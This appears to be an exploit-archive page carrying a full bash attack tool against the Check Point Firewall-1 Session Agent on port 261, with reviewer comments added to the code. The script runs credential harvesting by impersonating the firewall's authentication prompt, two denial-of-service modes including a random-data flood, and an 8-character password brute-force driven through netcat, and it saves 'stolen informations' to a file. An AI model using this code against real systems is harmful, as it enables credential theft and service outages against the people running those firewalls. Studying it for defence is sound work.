Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
A vulnerability in the Check Point Session Agent allows brute-force attacks on usernames and passwords.

Code

                                                source: http://www.securityfocus.com/bid/1662/info
 
A vulnerability exists in all versions of the Check Point Session Agent, part of Firewall-1. The Session Agent works in such a way that the firewall establishes a connection back to the client machine. Upon doing so, it prompts for a username and, if the username exists, for a password. On failure it re-prompts indefinitely. This allows a simple brute-force attack against the username and password.


#!/bin/bash
#
# Fwsa (FW-1 session auth), tested on linux 2.4.0 beta
# ( Swiss army knife for FW-1 Session authentication. )
#
# successfully tested against Session Authentication Agents 4.0 & 4.1
# and Firewall-1 module 4.0 
#
# please don't use it for any illegal activity but only for educational purposes
#
#         Gregory Duchemin   ( aka c3rb3r )
# 
#     for help or bug report <==> [email protected]

# 0ctober 2000

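#######################################
# Print the command-line help banner to stdout.
# Globals:   none ($0, the script name, is interpolated into the usage line)
# Arguments: none
# Outputs:   33 lines of usage text
# Returns:   0
#######################################
Usage()
{
  # One printf instead of 33 echos; $0 is kept inside the quoted argument so
  # a script path containing glob characters or repeated spaces is printed
  # verbatim (the original spliced it in unquoted, subject to word splitting
  # and globbing).  Every line is reproduced byte-for-byte.
  printf '%s\n' \
    '' \
    " Usage: $0 Targets_filez  type_of_attack [FQDN name] [dict file] [0/1/2/3]" \
    '' \
    '================proof of concept // Version 1.0 ===' \
    '===================================================' \
    '' \
    ' Note: Targets_filez is a plaintext file with all IPs to check' \
    '       I recommend u to make it with the help of Nmap ' \
    '       Try nmap -T Insane -sS -P0 -p 261 RANGE_IP to look for listening session agents.' \
    ' Note: Type of attack is 1 for password recovery, 2 for stupid DOS, 3 for ' \
    '       dangerous DOS and 4 for bruteforcing users password on Firewall' \
    '' \
    '       * password recovery will turn you back user FW1 login/password' \
    '       * stupid DOS just open a connexion and wait for nothing' \
    "         It'll block all other connexion and so, user access." \
    '       * dangerous DOS will enter an infinite loop within it send garbage.' \
    '         Will crash some weak systems. ( find wich ones ;) ) ' \
    '       * passwords Brute-force try to guess users password onto ' \
    '         the corporate firewall. Have to supply an external address in filez' \
    '         to force firewall to connect on local port ( port 261 ).' \
    '' \
    ' Note: FQDN name is Fully Qualified Domain name, default:firewall used for FW-1 ' \
    ' banner.' \
    ' Note: Change the internal variables filez and logfile to store your stock into, default:"..."' \
    ' Note: this proggy needs netcat to nicely work.' \
    '' \
    ' G00d Hunt !' \
    '' \
    ' author:  Gregory Duchemin  ( aka c3rb3r )' \
    '                          [email protected] ' \
    '' \
    ' N0 c0pyright, feel free to use or modify it as u want' \
    ''
}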

#######################################
# SIGINT handler (installed with `trap signal_handler SIGINT` further down):
# flush buffers, tell the operator the current target was aborted, and
# return so the enclosing loop goes on with the next target.
# Globals:   none
# Outputs:   one warning line to stdout, preceded by one blank line and
#            followed by two
# Returns:   0
#######################################
signal_handler()
{
  sync
  printf '\n%s\n\n\n' "Warning: target aborted, continuing with next one..."
}


#######################################
# Diagnostic printed when netcat reports a connection time-out on port 261
# (the callers treat "timed" in nc's -v output as filtered/down).
# Globals:   none
# Outputs:   four message lines to stdout, framed by one blank line on
#            each side
# Returns:   0
#######################################
filtered()
{
  local -r line1="Error: target port 261 doesn't respond"
  local -r line2="       it should be because target is filtering or is down."
  local -r line3="       Anyway, try again spoofing firewall address."
  local -r line4="       Arptool should be helpfull to do the job"
  printf '\n%s\n%s\n%s\n%s\n\n' "$line1" "$line2" "$line3" "$line4"
}

#######################################
# Diagnostic printed when netcat reports "refused" on port 261.
# Globals:   none
# Outputs:   two message lines to stdout, preceded by one blank line and
#            followed by two
# Returns:   0
#######################################
closed()
{
  printf '\n%s\n%s\n\n\n' \
    "Error: target port 261 is closed" \
    "       continuing with next ip."
}

#######################################
# Attack mode 2 ("stupid DOS"): for every address in $ip open one TCP
# connection to port 261 with netcat and hold it idle for $timeout seconds.
# The brace group piped into nc produces no data (sleep and sync print
# nothing), so the session carries no payload at all.
# Globals:   ip (read)      - whitespace-separated target addresses
#            timeout (read) - seconds the idle connection is held
#            logfile (read) - scratch file for nc's -v diagnostics
#                             (stdout+stderr); removed at the end
# Outputs:   banner per target to stdout; closed()/filtered() depending on
#            word 7 of nc's diagnostic line
# Returns:   0 (status of the final echo)
#
# What a defender sees: one idle TCP session to port 261 per target,
# lasting roughly $timeout seconds, from the host running this script.
#######################################
simple_dos()
{
for i in $ip; do 
echo
echo "***********************************************"
echo "Launching stupid DOS attack against "$i" !"
echo "***********************************************"
echo
echo
# Pipeline stage 1: nothing is written to the pipe; the stage just keeps
# nc's stdin open for $timeout seconds.  -n: no DNS, -w 2: 2-second timeout,
# -v: diagnostics on stderr, captured into $logfile via 2>&1.
{
sleep $timeout 
sync
}| nc -n -w 2 -v $i 261 > $logfile 2>&1
# The diagnostic is parsed positionally: word 7 is expected to be "refused"
# or "timed" (presumably from netcat's "Connection refused" / "Connection
# timed out" wording).  NOTE(review): the substitution is unquoted, so an
# empty file or a differently worded diagnostic breaks the `[` test.
if [ `awk '{ print $7 }' $logfile` = "refused" ]; then
closed
else
if [ `awk '{ print $7 }' $logfile` = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


#######################################
# Attack mode 3 ("dangerous DOS"): like simple_dos, but after the initial
# $timeout-second pause the brace group streams /dev/random into the
# connection for as long as nc keeps it open.
# Globals:   ip (read)      - whitespace-separated target addresses
#            timeout (read) - seconds to wait before the stream starts
#            logfile (read) - scratch file for nc's -v diagnostics
#                             (stdout+stderr); removed at the end
# Outputs:   banner per target to stdout; closed()/filtered() depending on
#            word 7 of nc's diagnostic line
# Returns:   0 (status of the final echo)
#
# What a defender sees: a TCP session to port 261 that goes silent for
# $timeout seconds and then carries a continuous stream of random bytes.
#######################################
dangerous_dos()
{
for i in $ip; do 
echo
echo "****************************************************"
echo "Launching dangerous DOS attack against "$i" !"
echo "****************************************************"
echo
echo
# Pipeline stage 1: cat runs until nc exits and the pipe breaks (SIGPIPE).
# /dev/random can block when the kernel's entropy pool is empty, which
# would throttle the stream on some systems — TODO confirm for the target
# kernel.
{
sleep $timeout 
cat /dev/random
}| nc -n -w 2 -v $i 261  > $logfile 2>&1
# Same positional parse of nc's diagnostic as in simple_dos: word 7 is
# expected to be "refused" or "timed".  NOTE(review): unquoted, so an empty
# or differently formatted $logfile breaks the `[` test.
if [ $( awk '{ print $7 }' $logfile) = "refused" ]; then
closed
else 
if [ $(awk '{ print $7 }' $logfile) = "timed" ]; then
filtered
fi
fi
done
rm $logfile
echo
echo "DOS terminated. ( Hope it's ok)"
echo
}


#######################################
# Attack mode 1 ("password recovery"): play the firewall's side of the
# Session Authentication dialogue toward the agent listening on $i:261.
# The brace group writes the prompts into nc's stdin (i.e. to the agent);
# whatever the agent types back is written by nc into $logfile, which the
# group polls until the username and then the password have arrived.
# Globals:   ip (read)      - whitespace-separated agent addresses
#            name (read)    - host name placed in the 220 banner
#            timeout (read) - seconds to wait before the banner is sent
#            logfile (read/write) - agent replies, as written by nc
#            filez (append) - results file (target, username, password)
# Outputs:   banner per target to stdout; captured pairs to $filez
# Returns:   0 (status of the final echo)
#
# What a defender sees: an inbound TCP connection to the agent's port 261
# that is NOT from the firewall, presenting a "220 FW-1 Session
# Authentication Request" banner — i.e. a credential-harvesting prompt.
#######################################
password_recovery()
{
for i in $ip; do 
echo
echo "*****************************************************"
echo "Launching FW1 password recovery against "$i" !"
echo "*****************************************************"
echo
echo
# Pipeline stage 1 runs in a subshell: the `exit 0` at its end terminates
# this stage only, not the script.  Everything echoed here goes to the agent.
{
sleep $timeout 
sync 
# Truncates the same file nc's stdout is redirected to, so stale content
# from a previous target cannot satisfy the `-s` test below.
cat /dev/null > $logfile
echo "220 FW-1 Session Authentication Request from "$name
echo "211 253141732 1988 3931424644 80 5"
echo "331 User:"
sync
# synchronisation of buffers and disks  
while [ ! -s $logfile ]; do 
# waiting for user info supply in logfile 
sleep 1
done
# First thing the agent sent is taken as the username (whole file content).
user=$(cat $logfile)

echo "331 *Firewall-1 password:"

# Wait until the file holds more than one line, i.e. a second reply arrived.
while [ `wc -l $logfile|awk '{ print $1 }'` -eq 1 ]; do
sleep 1
done
# Remove the username from every line, drop leading blank lines; the rest is
# taken as the password.  NOTE(review): $user comes from the network and is
# interpolated unquoted into the sed expression — any sed metacharacter in it
# changes the pattern (and a space splits the argument).
sed 's/'$user'//' $logfile | sed '/./,$!d' > ./tmp
password=$(cat ./tmp)
rm ./tmp
# Tell the agent the login succeeded so the session ends normally.
echo "200 User $user authenticated by Firewall-1 authentication."
echo "230 OK"
sleep 2
echo >> $filez
echo >> $filez
echo "===== Password recovery ============================================" >> $filez
echo "====================================================================" >> $filez
echo " Target <==> $i" >> $filez 
echo >> $filez 
echo " Username <==> $user    Password <==> $password" >> $filez
echo >> $filez 
echo >> $filez 
exit 0
}| nc  -n -w 2 -v $i 261  > $logfile
# ./tmp is normally removed inside the group; this covers an aborted run.
if [ -f ./tmp ]; then
rm tmp
fi
done
if [ -f $logfile ]; then
rm $logfile
fi
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



#######################################
# Attack mode 4: impersonate the Session Authentication Agent on the local
# host and guess first usernames, then 8-character passwords, against the
# firewall that connects back.  For each address in $ip a brace group is
# piped into a netcat listener on local TCP port 261: everything the group
# echoes goes to the peer, everything the peer sends lands in $logfile,
# which the group polls with grep.
# Globals:   ip (read)       - addresses probed on port 80; per the
#                               author's comment this triggers the
#                               firewall's connect-back (not verifiable here)
#            username (read) - whitespace-separated login candidates
#            logfile (read/write) - peer output, truncated before each probe
#            filez (append)  - results and one "trying ..." line per guess
#            timeout (read)  - seconds to wait for a reply per username
#            utimeout (read) - microseconds to wait per password guess
#            order (read)    - 0..3, selects the character permutation
# Outputs:   banner to stdout; results to $filez; ./.users as scratch file
# Returns:   0 (status of the final echo)
#
# Observable from the firewall side: one probe to port 80 per target, then
# a long-lived session on port 261 carrying one login name every $timeout
# seconds, followed by candidates roughly $utimeout microseconds apart with
# the username re-sent after every guess.
#######################################
password_bruteforce()
{
for i in $ip; do 


echo
echo "*****************************************************"
echo "Launching FW1 password BruteForce attack "
echo "*****************************************************"
echo
echo


if [ -s $logfile ]; then
cat /dev/null > $logfile
fi

# We use as many char string as there are in password because
# most of the time, admin won't use a "real" random generator but 
# a program that use a basic scheme.
# if u understand this scheme and modify the string below, u should be able to increase significantly your chances of succeed.  
# if passwords in your company are less than 8 chars, comment useless lines 

# password scheme:
# for instance, first letter could be uppercase ( A or H string depending on order byte ).
# initial values are commented

# A is the alphabet for loop variable i1, B..H for i2..i8.  A is restricted
# to uppercase letters; B..H are the full [a-zA-Z0-9] set.
#A='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
A='A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'

B='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
C='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
D='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
E='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
F='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
G='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
H='a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 1 2 3 4 5 6 7 8 9 0'
# Pipeline stage 1 runs in a subshell: every `exit` below ends this stage
# only, not the script.  Its stdout is the listener's stdin (sent to peer).
{
# we send a probe to anywhere in the world port 80 (or whatever fw rules allow), waiting for FW answer 
nc -w 2 -n $i 80 > /dev/null 2>&1

# waiting for invitation caller  
# Busy-wait (no sleep) until a line containing 331 shows up in $logfile.
grep 331 $logfile > /dev/null
while [ $? -eq 1 ]; 
do 
grep 331 $logfile > /dev/null
done

# we try now our login names until we get back the magic cookie
# actually we read login names in a file, it should be more efficient since most of admins use real names.
# u can use brute force to guess login in the same manner we use it for passwords.
# in this case, just change the few lines below to use chars strings from 1 up to 8 loops.

for user in $username
do
cat /dev/null > $logfile
sync
echo $user

# 530 eg NOTOK, error response
# fw1 session authentication reply with an error code if username doesn't exist, that's a flaw in itself.

sleep $timeout 

# Absence of a 530 within $timeout seconds is taken as "user exists";
# the name is recorded in $filez and queued in ./.users.
grep 530 $logfile > /dev/null
if [ $? -eq 1 ]; then
echo "===== Password Brute force ============================================" >> $filez
echo "====================================================================" >> $filez
echo >> $filez
echo >> $filez
echo " login ok :"$user >> $filez
echo >> $filez
echo >> $filez
echo $user >> ./.users
sync
continue
fi
done

# No accepted username: end this pipeline stage (the listener then sees EOF).
if [ ! -f ./.users ]; then 
exit
fi

targets=`cat ./.users`
rm ./.users
 
# Now it's time  we try to guess password for this user
# if passwords in your company are less than 8 chars, comment useless loops.


for user in $targets
do
 
# Eight nested loops, one per character position (i8 outermost, i1
# innermost).  Each "optional rule" skips candidates whose neighbouring
# positions hold the same character.
for i8 in $H 
do
for i7 in $G
do

# this rule is optional
if [ $i7 = $i8 ]; then
continue
fi

for i6 in $F
do

# this rule is optional
if [ $i6 = $i7 ]; then
continue
fi

for i5 in $E
do

# this rule is optional
if [ $i5 = $i6 ]; then
continue
fi

for i4 in $D 
do

# this rule is optional
if [ $i4 = $i5 ]; then
continue
fi

for i3 in $C
do

# this rule is optional
if [ $i3 = $i4 ]; then
continue
fi

for i2 in $B
do

# this rule is optional
if [ $i2 = $i3 ]; then
continue
fi

for i1 in $A
do

# this rule is optional
if [ $i1 = $i2 ]; then
continue
fi


# waiting for server

# Busy-wait until the peer has sent a 331 prompt (no sleep, spins the CPU).
grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done


# order is fetched by the user (see usage), and may be usefull for multi-process bruteforce.

# $order selects one of four fixed permutations of i1..i8; the candidate is
# sent to the peer and the same string is traced to $filez.
if [ $order -eq 0 ]; then
echo $i1$i2$i3$i4$i5$i6$i7$i8
# for debugging purpose
echo "trying $i1$i2$i3$i4$i5$i6$i7$i8" >> $filez
else
if [ $order -eq 1 ]; then
echo $i1$i7$i6$i5$i4$i3$i2$i8
echo "trying $i1$i7$i6$i5$i4$i3$i2$i8" >> $filez
else
if [ $order -eq 2 ]; then
echo $i1$i5$i8$i2$i4$i7$i3$i6
echo "trying $i1$i5$i8$i2$i4$i7$i3$i6" >> $filez
else
echo $i1$i2$i4$i7$i8$i3$i6$i5
echo "trying $i1$i2$i4$i7$i8$i3$i6$i5" >> $filez
fi
fi
fi
sync 
# usleep takes microseconds and is not a standard utility on every system.
usleep $utimeout 

# 230 eg OK, password is correct 

# A 230 in the peer output is treated as acceptance.
# NOTE(review): for order 1, 2 and 3 the string recorded below is a
# different permutation from the one echoed to the peer above; only order 0
# writes the candidate that was actually sent.
grep 230 $logfile > /dev/null
if [ $? -eq 0 ]; then
echo >> $filez
if [ $order -eq 0 ]; then
echo "password ok :"$i1$i2$i3$i4$i5$i6$i7$i8 >> $filez
else
if [ $order -eq 1 ]; then
echo "password ok :"$i8$i7$i6$i5$i4$i3$i2$i1 >> $filez
else
if [ $order -eq 2 ]; then
echo "password ok :"$i8$i5$i1$i2$i4$i7$i3$i6 >> $filez
else
echo "password ok :"$i2$i1$i4$i7$i8$i3$i6$i5 >> $filez
fi
fi
fi
echo >> $filez
echo >> $filez
exit
fi

# we r supposed to reinject username each time, this one we just discovered
# but connexion is still alive that's the major flaw.

grep 331 $logfile > /dev/null
while [ $? -eq 1 ];
do 
grep 331 $logfile > /dev/null
done

# Re-send the username on the still-open session before the next guess.
echo $user
done
done
done
done
done
done
done
done

done
# Pipeline stage 2: netcat listens on local port 261 (-l -p 261, -n: no
# DNS) and writes everything the peer sends, plus its own diagnostics, to
# $logfile.
}| nc  -n  -l -p 261  > $logfile 2>&1

#if [ -f $logfile ]; then
#rm $logfile
#fi
done
echo
echo "Done. ( see "$filez" to read stolen informations)"
echo
}



# ---------------------------------------------------------------------------
# Entry point: validate arguments, probe for netcat, set the globals the
# attack functions read (ip, filez, logfile, name, timeout, utimeout,
# username, order), install the SIGINT handler and dispatch on $2.
#   $1 - file with one target address per line (must be non-empty)
#   $2 - attack type 1..4
#   $3 - FQDN for the 220 banner, or, for type 4, the username dictionary
#   $4 - order (0..3), only meaningful for type 4
# ---------------------------------------------------------------------------

if [ $# -lt 2 ]; then
Usage
exit
fi

# netcat presence test: `nc -h` is expected to exit with status 1.
# NOTE(review): a netcat build that exits 0 on -h is rejected as "missing".
nc -h  > /dev/null 2>&1
if [ ! $? -eq 1 ]; then
Usage
echo
echo
echo "Error: "$0" needs netcat to properly run, please check u have it in your \$PATH or compile it now."
echo
exit
fi 

# Attack type must be one of 1..4.  NOTE(review): a non-numeric $2 makes
# `-eq` report an error instead of being rejected by this branch.
if [ ! $2 -eq 1 ] && [ ! $2 -eq 2 ] && [ ! $2 -eq 3 ] && [ ! $2 -eq 4 ]; then
Usage
echo
echo
echo "Error: Value for type of attack is out of range."
echo
exit
fi

# Target list must exist and be non-empty (-s).
if [ ! -s $1 ]; then
Usage
echo
echo
echo "Error: "$0" didn't find your Targets_ip filez."
echo
exit
fi

# Ctrl-C prints a warning and lets the current loop continue (see
# signal_handler); it does not stop the script.
trap signal_handler SIGINT


# Whole target file, whitespace-separated, iterated by the attack functions.
ip=`cat $1`


# filez is where results are writen, please change it for your configuration
# don't forget to change this values for every instance of the process, u would like to launch
filez="./......"
logfile="./logfile4"

# Results file is emptied on every run, before the remaining arguments are
# validated.
cat /dev/null > $filez

# Host name used in the 220 banner by password_recovery.  NOTE(review): the
# usage text advertises "default:firewall", the actual default is "fwl01".
name="fwl01"

# timeout is connexion timer when waiting for a server response.

timeout=2


# utimeout is pretty important, specifically for brute force attack, lower value means faster loop but if too low, fw reply would be mistaken
# that depends of your network round trip time and average firewall cpu usage.
# try different values first: default 22 millisecond

utimeout=22000

# $3 always overrides the banner name when present; for type 4 the same
# argument is then re-read as the username dictionary, so name ends up
# holding the dictionary path in that mode.
if [ $# -gt 2 ]; then
name=$3
fi
if [ $# -gt 2 ] && [ $2 -eq 4 ]; then
if [ ! -s $3 ]; then
Usage
echo
echo "Error: "$0" didn't find your dict filez or it's empty."
echo
exit
fi
username=`cat $3`
fi

# Permutation selector for password_bruteforce (0..3); not range-checked.
order=0
if [ $# -gt 3 ]; then
order=$4
fi

if [ -f $logfile ]; then
rm -f $logfile
fi

# Dispatch.  The `*)` arm is unreachable because $2 was validated above.
case "$2" in 
1)
   password_recovery
   ;;

2)
  simple_dos
  ;;

3)
  dangerous_dos
  ;;

4)
  password_bruteforce
  # Brute-force mode also dumps the results file to stdout when non-empty.
  if [ -s $filez ]; then
  cat $filez
  fi
  ;;

*)
  exit 1
esac
exit






                              
